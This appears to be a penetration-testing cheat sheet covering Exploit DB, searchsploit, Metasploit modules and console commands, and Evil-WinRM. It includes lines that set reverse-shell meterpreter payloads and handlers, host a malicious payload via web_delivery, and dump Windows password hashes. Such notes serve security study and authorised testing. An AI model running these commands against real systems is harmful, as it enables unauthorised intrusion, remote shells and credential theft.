Tools and Utilities

Here we can find some tools and utilities commonly used for processes related to exploitation:

Exploit DB

• A web repository that retains exploits for software and applications

• https://www.exploit-db.com/

Searchsploit

• Kali package for accessing ExploitDB

Commands

• Installation

sudo apt install exploitdb

---

• Usage

searchsploit $Keywords

Metasploit

• An exploitation framework with tools for every phase of pen-testing

Modules

• Auxiliary: Any supporting module

• Encoders: Encode exploit and payload for bypassing signature-based antivirus

• Evasion: For antivirus evasion

• Exploits: Exploits, organized by target system

• Nops: No Operation, CPU will do nothing for one cycle, often used as a buffer to achieve consistent payload sizes

• Payloads: Different payloads that can open shells on the target system

  • Adapters: Convert single payloads into different forms

  • Single: Also called in-line, does not need to download an additional component to run.

  • Stagers: Set up a connection channel between Metasploit and the target system. First, the stager is uploaded on the target system, and then it downloads the rest of the payload (stage)

  • Stages: Downloaded by the stager, allowing the use of larger-sized payloads

• Post: For post-exploitation

The difference between staged and single payloads is the use of _ or / in notation

Example: shell_reverse_tcp (Single) ---shell/reverse_tcp (Staged)

Common parameters

• RHOSTS: IP address of the target system

• RPORT: Port on the target system where the vulnerable application is running

• PAYLOAD: Payload that will be used with the exploit

• LHOST: Attacking machine (local) IP address

• LPORT: Port (local) that will be used for the reverse shell to connect back to

• SESSION: Session ID of the connection with Metasploit. Used with post-exploitation modules connected to the target system

Commands

• Installation

sudo apt install metasploit-framework

---

• Start the console

msfconsole
msf6\> sessions        #See all sessions
msf6\> session -i $id  #Change to a session

---

• List modules

tree -L 1 /usr/share/metasploit-framework/modules        #Types
tree -L 1 /usr/share/metasploit-framework/modules/$type  #Specific module type

---

• Search module

msf6\> search $query
msf6\> use $queryNumber #Use module from last search list (0 is the first)
msf6 > search type:$type $query #Filter by specific module type

The query value can be a keyword, CVE number, exploit/module name, or target system

---

• Usage

msf6\> use exploit/$exploit path
# This will enter the context of the exploit. Below is an example
msf6\> use exploit/windows/smb/ms17_010_eternalblue     #The exploit used
msf6 exploit(windows/smb/ms17_010_eternalblue)\>        #The terminal context set

'''\> info             #Display information about the module (''')
'''\> show options     #Display options for the actual context 
'''\> show payloads    #Display payloads that can be used with the exploit
'''\> show $module     #Can be used with every module type

'''\> set $parameter $value  #Set parameters in context
'''\> unset $parameter       #Unset a parameter
'''\> unset all              #Unset all parameters
'''\> setg $parameter $value #Set parameters globally
'''\> unsetg $parameter      #Unset global parameter

'''\> check       #Verify if vulnerable without exploiting
'''\> exploit     #Run exploit
'''\> run         #Same that exploit
'''\> exploit -z  #Run exploit and background session
'''\> background  #Background session, also CTLR+Z can be used
'''\> back        #Exit from context

meterpreter > $commands #Once an exploit is accessed, the terminal will change to meterpreter, and here we apply the commands of the specific module

---

• Common and useful scripts

msf6\> use exploit/multi/handler # Handles payloads from exploits
msf6\> set payload windows/meterpreter/reverse_tcp #Example with Reverse Shell

msf6\> use auxiliary/scanner/portscan/tcp #Performs a TCP port scan

msf6\> use post/windows/gather/hashdump #Dumps password hashes from Windows

msf6\> use multi/script/web_delivery #Set a web server to host a malicious payload
msf6\> set payload windows/meterpreter/reverse_tcp #Example with Reverse Shell

Payloads for Everything

A repository that contains payloads for diverse purposes and attacks

• https://github.com/swisskyrepo/PayloadsAllTheThings

Evil-WinRM

Tool to connect remotely to a Windows WinRM instance

• Install

sudo apt install evil-winrm

---

• Access to WinRM

sudo evil-winrm -i $ip -u $user -p $password